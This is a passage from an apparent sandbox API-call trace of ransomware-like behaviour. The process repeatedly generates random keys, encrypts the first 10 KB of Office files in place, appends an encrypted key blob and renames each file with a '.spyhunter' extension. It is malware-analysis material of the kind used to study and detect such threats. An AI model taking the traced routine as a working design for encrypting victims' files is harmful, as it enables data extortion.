Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.686] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 76 [0145.686] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.686] GetProcessHeap () returned 0x2c0000 [0145.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.686] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ef2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.697] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.697] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ef2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.698] GetProcessHeap () returned 0x2c0000 [0145.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.698] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.698] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef2c, lpOverlapped=0x0 | out: lpBuffer=0x57ef6c*, lpNumberOfBytesWritten=0x57ef2c*=0x4, lpOverlapped=0x0) returned 1 [0145.699] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef2c*=0x30, lpOverlapped=0x0) returned 1 [0145.699] CloseHandle (hObject=0x9c) returned 1 [0145.699] GetProcessHeap () returned 0x2c0000 [0145.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.699] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.spyhunter") returned 86 [0145.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.spyhunter")) returned 1 [0145.700] GetProcessHeap () returned 0x2c0000 [0145.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.700] GetProcessHeap () returned 0x2c0000 [0145.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.700] GetProcessHeap () returned 0x2c0000 [0145.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31658 | out: hHeap=0x2c0000) returned 1 [0145.700] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef70 | out: pbBuffer=0x57ef70) returned 1 [0145.700] GetProcessHeap () returned 0x2c0000 [0145.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.700] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef68*=0x30) returned 1 [0145.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.703] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 74 [0145.703] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.704] GetProcessHeap () returned 0x2c0000 [0145.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.704] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ef2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.712] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.713] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ef2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.713] GetProcessHeap () returned 0x2c0000 [0145.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.713] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.713] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef2c, lpOverlapped=0x0 | out: lpBuffer=0x57ef6c*, lpNumberOfBytesWritten=0x57ef2c*=0x4, lpOverlapped=0x0) returned 1 [0145.714] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef2c*=0x30, lpOverlapped=0x0) returned 1 [0145.714] CloseHandle (hObject=0x9c) returned 1 [0145.714] GetProcessHeap () returned 0x2c0000 [0145.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0145.714] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.spyhunter") returned 84 [0145.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.spyhunter")) returned 1 [0145.715] GetProcessHeap () returned 0x2c0000 [0145.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0145.715] GetProcessHeap () returned 0x2c0000 [0145.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.715] GetProcessHeap () returned 0x2c0000 [0145.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6e88 | out: hHeap=0x2c0000) returned 1 [0145.715] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef68 | out: pbBuffer=0x57ef68) returned 1 [0145.715] GetProcessHeap () returned 0x2c0000 [0145.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.715] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef60*=0x30) returned 1 [0145.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.716] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 73 [0145.716] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.716] GetProcessHeap () returned 0x2c0000 [0145.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.716] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ef24*=0x2800, lpOverlapped=0x0) returned 1 [0145.731] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.731] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ef24*=0x2800, lpOverlapped=0x0) returned 1 [0145.731] GetProcessHeap () returned 0x2c0000 [0145.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.731] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.731] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef24, lpOverlapped=0x0 | out: lpBuffer=0x57ef64*, lpNumberOfBytesWritten=0x57ef24*=0x4, lpOverlapped=0x0) returned 1 [0145.748] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef24*=0x30, lpOverlapped=0x0) returned 1 [0145.748] CloseHandle (hObject=0x9c) returned 1 [0145.748] GetProcessHeap () returned 0x2c0000 [0145.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.749] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.spyhunter") returned 83 [0145.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.spyhunter")) returned 1 [0145.749] GetProcessHeap () returned 0x2c0000 [0145.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.749] GetProcessHeap () returned 0x2c0000 [0145.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.749] GetProcessHeap () returned 0x2c0000 [0145.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6da8 | out: hHeap=0x2c0000) returned 1 [0145.750] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef68 | out: pbBuffer=0x57ef68) returned 1 [0145.750] GetProcessHeap () returned 0x2c0000 [0145.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.750] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef60*=0x30) returned 1 [0145.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.750] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 74 [0145.750] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.750] GetProcessHeap () returned 0x2c0000 [0145.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0145.750] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ef24*=0x2800, lpOverlapped=0x0) returned 1 [0145.753] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.753] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ef24*=0x2800, lpOverlapped=0x0) returned 1 [0145.753] GetProcessHeap () returned 0x2c0000 [0145.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0145.753] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.754] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef24, lpOverlapped=0x0 | out: lpBuffer=0x57ef64*, lpNumberOfBytesWritten=0x57ef24*=0x4, lpOverlapped=0x0) returned 1 [0145.754] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef24*=0x30, lpOverlapped=0x0) returned 1 [0145.755] CloseHandle (hObject=0x9c) returned 1 [0145.755] GetProcessHeap () returned 0x2c0000 [0145.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.755] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.spyhunter") returned 84 [0145.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.spyhunter")) returned 1 [0145.756] GetProcessHeap () returned 0x2c0000 [0145.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.756] GetProcessHeap () returned 0x2c0000 [0145.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.756] GetProcessHeap () returned 0x2c0000 [0145.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6be8 | out: hHeap=0x2c0000) returned 1 [0145.756] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef60 | out: pbBuffer=0x57ef60) returned 1 [0145.756] GetProcessHeap () returned 0x2c0000 [0145.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.756] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef58*=0x30) returned 1 [0145.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.758] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 75 [0145.758] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.759] GetProcessHeap () returned 0x2c0000 [0145.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.759] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ef1c*=0x2800, lpOverlapped=0x0) returned 1 [0145.854] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.854] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ef1c*=0x2800, lpOverlapped=0x0) returned 1 [0145.854] GetProcessHeap () returned 0x2c0000 [0145.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.854] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.854] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef1c, lpOverlapped=0x0 | out: lpBuffer=0x57ef5c*, lpNumberOfBytesWritten=0x57ef1c*=0x4, lpOverlapped=0x0) returned 1 [0145.855] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef1c*=0x30, lpOverlapped=0x0) returned 1 [0145.855] CloseHandle (hObject=0x9c) returned 1 [0145.856] GetProcessHeap () returned 0x2c0000 [0145.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.856] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.spyhunter") returned 85 [0145.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.spyhunter")) returned 1 [0145.856] GetProcessHeap () returned 0x2c0000 [0145.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.856] GetProcessHeap () returned 0x2c0000 [0145.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.856] GetProcessHeap () returned 0x2c0000 [0145.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6b08 | out: hHeap=0x2c0000) returned 1 [0145.857] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef60 | out: pbBuffer=0x57ef60) returned 1 [0145.857] GetProcessHeap () returned 0x2c0000 [0145.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.857] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef58*=0x30) returned 1 [0145.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.857] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 76 [0145.857] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0145.857] GetProcessHeap () returned 0x2c0000 [0145.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.857] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ef1c*=0x2800, lpOverlapped=0x0) returned 1 [0145.866] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.866] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ef1c*=0x2800, lpOverlapped=0x0) returned 1 [0145.866] GetProcessHeap () returned 0x2c0000 [0145.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.866] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.866] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef1c, lpOverlapped=0x0 | out: lpBuffer=0x57ef5c*, lpNumberOfBytesWritten=0x57ef1c*=0x4, lpOverlapped=0x0) returned 1 [0145.905] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef1c*=0x30, lpOverlapped=0x0) returned 1 [0145.905] CloseHandle (hObject=0x9c) returned 1 [0145.910] GetProcessHeap () returned 0x2c0000 [0145.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.910] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.spyhunter") returned 86 [0145.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.spyhunter")) returned 1 [0145.911] GetProcessHeap () returned 0x2c0000 [0145.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.911] GetProcessHeap () returned 0x2c0000 [0145.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.911] GetProcessHeap () returned 0x2c0000 [0145.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f310e8 | out: hHeap=0x2c0000) returned 1 [0145.912] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef58 | out: pbBuffer=0x57ef58) returned 1 [0145.912] GetProcessHeap () returned 0x2c0000 [0145.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.912] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef50*=0x30) returned 1 [0145.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.913] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 76 [0145.913] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0145.913] GetProcessHeap () returned 0x2c0000 [0145.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.913] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, 